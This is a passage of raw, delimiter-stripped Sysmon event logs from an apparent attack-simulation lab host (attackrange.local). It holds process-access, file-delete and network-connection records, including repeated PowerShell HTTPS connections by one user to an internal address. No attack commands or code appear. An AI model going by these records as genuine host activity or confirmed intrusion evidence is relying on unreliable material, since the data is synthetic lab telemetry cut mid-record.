Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000035084071Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:08.618{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56557-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 10341000x800000000000000035084070Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:44.316{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4DAC-613A-2C90-03000000C801}6180C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084069Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:08:44.316{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084068Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:44.316{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084067Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:08:44.316{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084066Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:44.316{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084065Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:08:44.316{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-4DAC-613A-2C90-03000000C801}6180C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035084064Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:44.316{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4DAC-613A-2C90-03000000C801}6180C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035084063Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:44.302{B81B27B7-4DAC-613A-2C90-03000000C801}6180C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" 
--ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035084085Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:45.884{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CE7CA1722DC66AE1A80CDF388F81B98E,SHA256=D197B01ACA81746C0C79F8BB783898A24F53295429E143F1F6C49746A49AF7BE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084084Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:09.233{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56558-false10.0.1.12-8000- 10341000x800000000000000035084083Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:45.016{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4DAD-613A-2D90-03000000C801}4912C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084082Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:08:45.016{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084081Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:45.016{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084080Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:08:45.016{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084079Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:45.016{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084078Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:08:45.016{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-4DAD-613A-2D90-03000000C801}4912C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035084077Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:45.016{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4DAD-613A-2D90-03000000C801}4912C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035084076Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:45.001{B81B27B7-4DAD-613A-2D90-03000000C801}4912C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035084088Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:46.933{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=21A952F18925B7020B2717F560DB5501,SHA256=2D1B7E60767F05C1F7BFE63C981E182E9A065E39CC119E8AF167509361B93EE5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084087Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:46.868{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=58C1AD333E34902E9E8679F0A7C17EBE,SHA256=D56566CF84DA6579DE8F1B353C7DA071A3B29A129C4A181DEF2AF4D8E3A6041A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084086Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:46.037{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
space 23542300x800000000000000035084157Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:17.671{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=864827C1E6689C2567CDD903FAD8CCAE,SHA256=CD92E3D21E0EA01E8E7B70A75EAE27DE2815F760770444D190050F64D56B7371,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084159Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:18.685{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C462FC78EE237B617485F01FC279D890,SHA256=5C7C0C940124ECD8900829380FD4AD7A25746111538B4D59B6E61C5F96DD69B4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084158Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:42.119{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56572-false10.0.1.12-8000- 23542300x800000000000000035084160Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:19.700{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DE0F55C20092B6E47417106F18BFF2F3,SHA256=91E88452FF17ACB1654F9AA978B62DDD8B77B1FD5E9C48E1DC474C4567C03DE2,IMPHASH=00000000000000000000000000000000falsefalse - 
insufficient disk space 23542300x800000000000000035084162Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:20.937{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=8FDE6F4EA1DF534EA832B2474DA6C593,SHA256=A954167DBD299D7AC588DBB5AAEF080B566D33FC97FA6017AE1D36E4393699EA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084161Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:20.717{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8408BFCC6EC79E5EE578A93B193ED6C2,SHA256=08EDE5018F27D8EDE9B4EB848E674BD98396752CAE87CEB4EDC416BDB3C088F2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084164Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:21.736{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0A0CAEB3EFE1332D752DCE5127EA4DDE,SHA256=FD209E6D541E6B36CC1713A579106EEB27B63A262254BDDE2895BC8D8710FE58,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084163Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:09:45.737{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56573-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035084165Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:22.739{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A5938A6E3CC7EF400407234937772470,SHA256=56366D1075E3C09A4E0C07C2F55CF6D24FCE2F6449C7F9C95BB62B622B9C05E5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084167Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:23.769{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F9A11899975ADDF3CBED15975C635C4A,SHA256=B9F04DA4FC30845CE45AA6CED106FB119E171C06387CBA3C22F16FCBD9EF48C2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084166Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:48.114{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56574-false10.0.1.12-8000- 23542300x800000000000000035084168Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:24.785{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0D9FE58AEF0F6C0EB939143AFAFC3558,SHA256=8C67C3BDEC158833DB8221D84627383671D8DEBAE9DED9E6CF4E95C085510220,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084170Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:25.790{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=022453ADCD3E112B6E65973C9F08F319,SHA256=AD368E928B7E14AD8099DCB238C13D52409F8D501679B6DF3C5BF9AC5AEE1306,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084169Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:25.743{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=625BB293D327B9B01C16C33A6384BC15,SHA256=BBB669D8DFD09A1EC8E89189E200B17AA4ECBC398959A27456A55CE07FCBDA5D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084172Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:26.831{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B6762F4271BB0F892A6F18B95FF4F00A,SHA256=339C4F25922B057D0E49689CFF7C9727E5A3622288FC78566AED8E0885782EF0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
354300x800000000000000035084171Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:50.755{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56575-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035084173Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:27.851{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CB8D41910E747E67871F6B405153F8C0,SHA256=90774D4B63A60C606E6ED0C7CB962EA1BBA0943210D0FBB7944EAFEA008651AC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk 